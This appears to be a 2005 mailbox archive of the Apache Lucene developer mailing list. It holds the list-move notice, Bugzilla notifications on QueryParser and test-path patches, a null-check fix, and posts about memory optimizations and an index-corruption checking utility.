http://peerfear.org/ > GPG fingerprint: 5FB2 F3E2 760E 70A8 6174 D393 E84D 8D04 99F1 4412 > > > --------------------------------------------------------------------- > To unsubscribe, e-mail: [email protected] > For additional commands, e-mail: [email protected] --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Mar 02 05:38:44 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 58679 invoked from network); 2 Mar 2005 05:38:44 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 2 Mar 2005 05:38:44 -0000 Received: (qmail 4862 invoked by uid 500); 2 Mar 2005 05:38:40 -0000 Delivered-To: [email protected] Received: (qmail 4817 invoked by uid 500); 2 Mar 2005 05:38:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Unsubscribe: <mailto:[email protected]> List-Subscribe: <mailto:[email protected]> List-Help: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: "Lucene Developers List" <lucene-dev.jakarta.apache.org> Reply-To: "Lucene Developers List" <[email protected]> Delivered-To: mailing list [email protected] Received: (qmail 4771 invoked by uid 99); 2 Mar 2005 05:38:39 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: neutral (hermes.apache.org: local policy) Received: from scorpio.lunarpages.com (HELO scorpio.lunarpages.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Tue, 01 Mar 2005 21:38:38 -0800 Received: from [161.129.204.104] (helo=[161.129.204.104]) by scorpio.lunarpages.com with esmtpsa (TLSv1:RC4-SHA:128) (Exim 4.44) id 1D6MZ9-000280-ID for [email protected]; Tue, 01 Mar 2005 21:38:35 -0800 Mime-Version: 1.0 (Apple Message framework v619.2) Content-Transfer-Encoding: 7bit Message-Id: <[email protected]> Content-Type: text/plain; charset=US-ASCII; format=flowed To: [email protected] From: Roy T. Fielding <[email protected]> Subject: list moving to lucene.apache.org Date: Tue, 1 Mar 2005 21:38:39 -0800 X-Mailer: Apple Mail (2.619.2) X-AntiAbuse: This header was added to track abuse, please include it with any abuse report X-AntiAbuse: Primary Hostname - scorpio.lunarpages.com X-AntiAbuse: Original Domain - jakarta.apache.org X-AntiAbuse: Originator/Caller UID/GID - [0 0] / [47 12] X-AntiAbuse: Sender Address Domain - apache.org X-Source: X-Source-Args: X-Source-Dir: X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N This list is about to be moved to [email protected]. Please excuse the temporary inconvenience. Cheers, Roy T. Fielding, co-founder, The Apache Software Foundation ([email protected]) <http://roy.gbiv.com/> --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Mar 02 16:54:52 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 85525 invoked from network); 2 Mar 2005 16:54:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 2 Mar 2005 16:54:52 -0000 Received: (qmail 66109 invoked by uid 500); 2 Mar 2005 16:54:50 -0000 Delivered-To: [email protected] Received: (qmail 65851 invoked by uid 500); 2 Mar 2005 16:54:49 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 65837 invoked by uid 500); 2 Mar 2005 16:54:48 -0000 Delivered-To: [email protected] Received: (qmail 65834 invoked by uid 99); 2 Mar 2005 16:54:48 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Wed, 02 Mar 2005 08:54:47 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j22Gsi73010053 for <[email protected]>; Wed, 2 Mar 2005 17:54:44 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j22GsiFI010051; Wed, 2 Mar 2005 17:54:44 +0100 Date: Wed, 2 Mar 2005 17:54:44 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 25820] - [PATCH] QueryParser not handling queries containing AND and OR X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=25820>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=25820 ------- Additional Comments From [email protected] 2005-03-02 17:54 ------- I tried applying the latest QueryParser.jj patch but it failed. Could you update this patch to the current svn version of QueryParser.jj? And we need to have some test cases to prove this works as expected. I'll apply it. There are other ways to achieve this with JavaCC which I'm exploring myself in a custom query parser. -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Mar 02 19:44:30 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 69783 invoked from network); 2 Mar 2005 19:44:30 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 2 Mar 2005 19:44:30 -0000 Received: (qmail 21720 invoked by uid 500); 2 Mar 2005 19:44:28 -0000 Delivered-To: [email protected] Received: (qmail 21669 invoked by uid 500); 2 Mar 2005 19:44:27 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 21655 invoked by uid 500); 2 Mar 2005 19:44:27 -0000 Delivered-To: [email protected] Received: (qmail 21651 invoked by uid 99); 2 Mar 2005 19:44:27 -0000 X-ASF-Spam-Status: No, hits=0.2 required=10.0 tests=NO_REAL_NAME X-Spam-Check-By: apache.org Received-SPF: neutral (hermes.apache.org: local policy) Received: from svr.ftp1.com (HELO svr.ftp1.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Wed, 02 Mar 2005 11:44:26 -0800 Received: from graphite by svr.ftp1.com with local (Exim 4.43) id 1D6Zlf-0000es-2Z for [email protected]; Wed, 02 Mar 2005 13:44:23 -0600 Received: from 161.129.204.104 ([161.129.204.104]) (SquirrelMail authenticated user [email protected]); by simpleobjects.com with HTTP; Wed, 2 Mar 2005 13:44:23 -0600 (CST) Message-ID: <[email protected]> Date: Wed, 2 Mar 2005 13:44:23 -0600 (CST) Subject: some optimization and other hacks From: [email protected] To: [email protected] User-Agent: SquirrelMail/1.4.3a X-Mailer: SquirrelMail/1.4.3a MIME-Version: 1.0 Content-Type: text/plain;charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Priority: 3 (Normal) Importance: Normal X-AntiAbuse: This header was added to track abuse, please include it with any abuse report X-AntiAbuse: Primary Hostname - svr.ftp1.com X-AntiAbuse: Original Domain - jakarta.apache.org X-AntiAbuse: Originator/Caller UID/GID - [32038 808] / [47 12] X-AntiAbuse: Sender Address Domain - simpleobjects.com X-Source: /usr/local/cpanel/3rdparty/bin/php X-Source-Args: /usr/local/cpanel/3rdparty/bin/php /usr/local/cpanel/base/3rdparty/squirrelmail/src/compose.php X-Source-Dir: :/base/3rdparty/squirrelmail/src X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N I have a few changes that have really paid off for me. They are hacks, but I thought I would pass this on in case anyone else might be interested: http://simpleobjects.com/LuceneOptimizationHacks.zip (my apologies for the crude packaging) changes: 1. jdk 1.4 file locking mechanism implementation (this could be implemented using reflection in case you want to leave in support for jdk 1.3). 2. compact bit set implementation (ztree) for rangefilters that are very sparse. When I filter on dates, it turns out, most of the doc ids (in general) are found near each other. This saves me huge amounts of memory. 3. a hack to remove some code that stores the field values for fields on which you are sorting (this appears to only be required when using multi-indexes (which I am not)). This also saves me a lot of memory. other ideas i have found helpful (more for the users list)... 1. when you need to filter and sort by dates, store multiple copies (fields) of the date. 1 copy for the sorting (this can have millisecond resolution) and another for the precision you want to filter by. I have found minute resolution very useful and also very fast for filtering to ranges even spanning months with huge numbers of docs. Tony Schwartz --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Mar 02 21:55:31 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 40638 invoked from network); 2 Mar 2005 21:55:31 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 2 Mar 2005 21:55:31 -0000 Received: (qmail 63448 invoked by uid 500); 2 Mar 2005 21:55:29 -0000 Delivered-To: [email protected] Received: (qmail 63402 invoked by uid 500); 2 Mar 2005 21:55:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 63389 invoked by uid 500); 2 Mar 2005 21:55:29 -0000 Delivered-To: [email protected] Received: (qmail 63386 invoked by uid 99); 2 Mar 2005 21:55:29 -0000 X-ASF-Spam-Status: No, hits=0.2 required=10.0 tests=NO_REAL_NAME X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Wed, 02 Mar 2005 13:55:28 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j22LtQpX003300 for <[email protected]>; Wed, 2 Mar 2005 22:55:26 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j22LtPh2003298; Wed, 2 Mar 2005 22:55:25 +0100 Date: Wed, 2 Mar 2005 22:55:25 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 33820] New: - FIXME in src/test/org/apache/lucene/IndexTest.java X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=33820>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=33820 Summary: FIXME in src/test/org/apache/lucene/IndexTest.java Product: Lucene Version: unspecified Platform: Macintosh OS/Version: Mac OS X 10.3 Status: NEW Severity: trivial Priority: P1 Component: Examples AssignedTo: [email protected] ReportedBy: [email protected] Index: src/test/org/apache/lucene/IndexTest.java =============================================================== ==== --- src/test/org/apache/lucene/IndexTest.java (revision 155945) +++ src/test/org/apache/lucene/IndexTest.java (working copy) @@ -27,8 +27,7 @@ public static void main(String[] args) { try { Date start = new Date(); - // FIXME: OG: what's with this hard-coded dirs?? - IndexWriter writer = new IndexWriter("F:\\test", new SimpleAnalyzer(), + IndexWriter writer = new IndexWriter(File.createTempFile("luceneTest","idx"), new SimpleAnalyzer(), true); writer.setMergeFactor(20); -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Wed Mar 02 21:56:48 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41797 invoked from network); 2 Mar 2005 21:56:35 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 2 Mar 2005 21:56:35 -0000 Received: (qmail 64869 invoked by uid 500); 2 Mar 2005 21:56:33 -0000 Delivered-To: [email protected] Received: (qmail 64848 invoked by uid 500); 2 Mar 2005 21:56:33 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 64833 invoked by uid 500); 2 Mar 2005 21:56:33 -0000 Delivered-To: [email protected] Received: (qmail 64830 invoked by uid 99); 2 Mar 2005 21:56:33 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Wed, 02 Mar 2005 13:56:32 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j22LuTkv003342 for <[email protected]>; Wed, 2 Mar 2005 22:56:29 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j22LuTUI003340; Wed, 2 Mar 2005 22:56:29 +0100 Date: Wed, 2 Mar 2005 22:56:29 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 33820] - FIXME in src/test/org/apache/lucene/IndexTest.java X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=33820>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=33820 ------- Additional Comments From [email protected] 2005-03-02 22:56 ------- Created an attachment (id=14390) --> (http://issues.apache.org/bugzilla/attachment.cgi?id=14390&action=view) patch to fix issue This is a duplicate of what's included in the description -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 03 06:59:26 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 81500 invoked from network); 3 Mar 2005 06:59:25 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 3 Mar 2005 06:59:25 -0000 Received: (qmail 97627 invoked by uid 500); 3 Mar 2005 06:59:24 -0000 Delivered-To: [email protected] Received: (qmail 97268 invoked by uid 500); 3 Mar 2005 06:59:23 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 97255 invoked by uid 500); 3 Mar 2005 06:59:23 -0000 Delivered-To: [email protected] Received: (qmail 97252 invoked by uid 99); 3 Mar 2005 06:59:23 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Wed, 02 Mar 2005 22:59:22 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j236xJYc004893 for <[email protected]>; Thu, 3 Mar 2005 07:59:19 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j236xJjW004891; Thu, 3 Mar 2005 07:59:19 +0100 Date: Thu, 3 Mar 2005 07:59:19 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 25820] - [PATCH] QueryParser not handling queries containing AND and OR X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=25820>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=25820 ------- Additional Comments From [email protected] 2005-03-03 07:59 ------- OK, I'll look into this. But it might take some time (1-2 weeks). If you're going to fix it otherwise, let me know. Of course it should be able to do the operator precenedence on the javacc level, though I'm not sure about the details of the needed recursion. But that might end in a major rewrite of qp, something I wanted to avoid, when I wrote the patch. -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 03 20:12:42 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 54580 invoked from network); 3 Mar 2005 20:12:41 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 3 Mar 2005 20:12:41 -0000 Received: (qmail 45402 invoked by uid 500); 3 Mar 2005 20:12:40 -0000 Delivered-To: [email protected] Received: (qmail 45374 invoked by uid 500); 3 Mar 2005 20:12:39 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 45360 invoked by uid 99); 3 Mar 2005 20:12:39 -0000 X-ASF-Spam-Status: No, hits=0.1 required=10.0 tests=FORGED_RCVD_HELO,HTML_30_40,HTML_MESSAGE X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from mail.alterpoint.com (HELO exchange.inside.eclyptic.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 03 Mar 2005 12:12:38 -0800 X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0 Content-class: urn:content-classes:message MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----_=_NextPart_001_01C5202D.578C87E8" Subject: Checking an index Date: Thu, 3 Mar 2005 14:12:36 -0600 Message-ID: <[email protected]> X-MS-Has-Attach: X-MS-TNEF-Correlator: Thread-Topic: Checking an index Thread-Index: AcUgLVeKYkYZuJjtTKWNBKG9Z0yl9Q== From: "Ravi Rao" <[email protected]> To: <[email protected]> Cc: "Ravi Rao" <[email protected]> X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N ------_=_NextPart_001_01C5202D.578C87E8 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable All, I have written a utility that will check if an index has been corrupted. The implementation is (my understanding of) an idea proposed, to the best of my knowledge, by Doug Cutting on the lucene-user's mailing list. NullDirectory provides input and output streams that don't themselves do anything useful. That is, there is no real index behind the directory. However one can merge another index with an instance of null index thereby causing a 'read' of the other index. This 'read' will fail if that index is corrupt. If there is any interest would someone please tell me how I can contribute this to the sandbox. It requires more testing and quite possibly improvement. However I would like to get the process of contributing started. Thanks, --=20 Ravi(ndra) Rao/ Alterpoint Inc. ------_=_NextPart_001_01C5202D.578C87E8-- From [email protected] Thu Mar 03 20:51:11 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 84620 invoked from network); 3 Mar 2005 20:51:10 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 3 Mar 2005 20:51:10 -0000 Received: (qmail 86860 invoked by uid 500); 3 Mar 2005 20:51:09 -0000 Delivered-To: [email protected] Received: (qmail 86838 invoked by uid 500); 3 Mar 2005 20:51:08 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 86825 invoked by uid 99); 3 Mar 2005 20:51:08 -0000 X-ASF-Spam-Status: No, hits=0.0 required=10.0 tests= X-Spam-Check-By: apache.org Received-SPF: pass (hermes.apache.org: local policy) Received: from Unknown (HELO ehatchersolutions.com) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 03 Mar 2005 12:51:07 -0800 Received: by ehatchersolutions.com (Postfix, from userid 504) id 2720313E210D; Thu, 3 Mar 2005 15:51:06 -0500 (EST) Received: from [161.129.204.104] (d-128-167-124.bootp.Virginia.EDU [161.129.204.104]) by ehatchersolutions.com (Postfix) with ESMTP id AF18713E210D for <[email protected]>; Thu, 3 Mar 2005 15:51:04 -0500 (EST) Mime-Version: 1.0 (Apple Message framework v619.2) In-Reply-To: <[email protected]> References: <[email protected]> Content-Type: text/plain; charset=US-ASCII; format=flowed Message-Id: <[email protected]> Content-Transfer-Encoding: 7bit From: Erik Hatcher <[email protected]> Subject: Re: Checking an index Date: Thu, 3 Mar 2005 15:51:03 -0500 To: [email protected] X-Mailer: Apple Mail (2.619.2) X-Spam-Checker-Version: SpamAssassin 3.0.1 (2004-10-22) on javelina X-Spam-Status: No, score=-3.3 required=5.0 tests=AWL,BAYES_00 autolearn=ham version=3.0.1 X-Spam-Level: X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Please contribute your code to a Bugzilla issue (http://issues.apache.org/bugzilla/ - first create a new issue, then make an attachment). Erik On Mar 3, 2005, at 3:12 PM, Ravi Rao wrote: > All, > > I have written a utility that will check if an index has been > corrupted. The implementation is (my understanding of) an idea > proposed, to the best of my knowledge, by Doug Cutting on the > lucene-user's mailing list. > > NullDirectory provides input and output streams that don't themselves > do anything useful. That is, there is no real index behind the > directory. However one can merge another index with an instance of > null index thereby causing a 'read' of the other index. This 'read' > will fail if that index is corrupt. > > If there is any interest would someone please tell me how I can > contribute this to the sandbox. It requires more testing and quite > possibly improvement. However I would like to get the process of > contributing started. > > Thanks, > -- > Ravi(ndra) Rao/ > Alterpoint Inc. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 03 21:12:27 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 92812 invoked from network); 3 Mar 2005 21:12:27 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 3 Mar 2005 21:12:27 -0000 Received: (qmail 9563 invoked by uid 500); 3 Mar 2005 21:12:26 -0000 Delivered-To: [email protected] Received: (qmail 9536 invoked by uid 500); 3 Mar 2005 21:12:25 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 9523 invoked by uid 500); 3 Mar 2005 21:12:25 -0000 Delivered-To: [email protected] Received: (qmail 9520 invoked by uid 99); 3 Mar 2005 21:12:25 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 03 Mar 2005 13:12:25 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j23LCMEb006452 for <[email protected]>; Thu, 3 Mar 2005 22:12:22 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j23LCMDl006450; Thu, 3 Mar 2005 22:12:22 +0100 Date: Thu, 3 Mar 2005 22:12:22 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 33835] New: - Object reference error X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=33835>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=33835 Summary: Object reference error Product: Lucene Version: CVS Nightly - Specify date in submission Platform: PC OS/Version: Windows XP Status: NEW Severity: normal Priority: P3 Component: Index AssignedTo: [email protected] ReportedBy: [email protected] ej: search for: * PhrasePrefixQuery * .SetSlop(10) * .Add() with: IndexReader.Terms( new Term(field, word1+"*") ) * .Add() with: IndexReader.Terms( new Term(field, word2+"*") ) in MultipleTermPositions.java - "public bool SkipTo(int target)" it is posible that "_termPositionsQueue.Peek()" returns null I changed the source from: public bool SkipTo(int target) { while ( target > _termPositionsQueue.Peek().Doc()) { to public bool SkipTo(int target) { TermPositions tpT = null ; while ( (tpT = _termPositionsQueue.Peek()) !=null && target > tpT.Doc()) { is that ok? TIA -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 03 22:42:32 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 28533 invoked from network); 3 Mar 2005 22:42:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 3 Mar 2005 22:42:32 -0000 Received: (qmail 55149 invoked by uid 500); 3 Mar 2005 22:42:29 -0000 Delivered-To: [email protected] Received: (qmail 55111 invoked by uid 500); 3 Mar 2005 22:42:29 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <java-dev.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 55086 invoked by uid 500); 3 Mar 2005 22:42:29 -0000 Delivered-To: [email protected] Received: (qmail 55068 invoked by uid 99); 3 Mar 2005 22:42:29 -0000 X-ASF-Spam-Status: No, hits=0.4 required=10.0 tests=NO_REAL_NAME,UPPERCASE_25_50 X-Spam-Check-By: apache.org Received: from ajax-1.apache.org (HELO ajax.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.28) with ESMTP; Thu, 03 Mar 2005 14:42:28 -0800 Received: from ajax.apache.org (ajax.apache.org [161.129.204.104]) by ajax.apache.org (8.12.11/8.12.11) with ESMTP id j23MgQXF028423 for <[email protected]>; Thu, 3 Mar 2005 23:42:26 +0100 Received: (from nobody@localhost) by ajax.apache.org (8.12.11/8.12.11/Submit) id j23MgPNe028421; Thu, 3 Mar 2005 23:42:25 +0100 Date: Thu, 3 Mar 2005 23:42:25 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: DO NOT REPLY [Bug 33835] - Object reference error X-Bugzilla-Reason: AssignedTo X-Virus-Checked: Checked X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N DO NOT REPLY TO THIS EMAIL, BUT PLEASE POST YOUR BUG· RELATED COMMENTS THROUGH THE WEB INTERFACE AVAILABLE AT <http://issues.apache.org/bugzilla/show_bug.cgi?id=33835>. ANY REPLY MADE TO THIS MESSAGE WILL NOT BE COLLECTED AND· INSERTED IN THE BUG DATABASE. http://issues.apache.org/bugzilla/show_bug.cgi?id=33835 ------- Additional Comments From [email protected] 2005-03-03 23:42 ------- Judging from the look of the code you included, it looks like you are using dotLucene (Lucene.NET). Is this correct? -- Configure bugmail: http://issues.apache.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are the assignee for the bug, or are watching the assignee. --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] From [email protected] Thu Mar 03 22:49:55 2005 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 39699 invoked from network); 3 Mar 2005 22:49:55 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 3 Mar 2005 22:49:55 -0000 Received: (qmail 81442 invoked by uid 500); 3 Mar 2005 22:49:53 -0000 Delivered-To: [email protected] Received: (qmail 81412 invoked by uid 500); 3 Mar 2005 22:49:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> 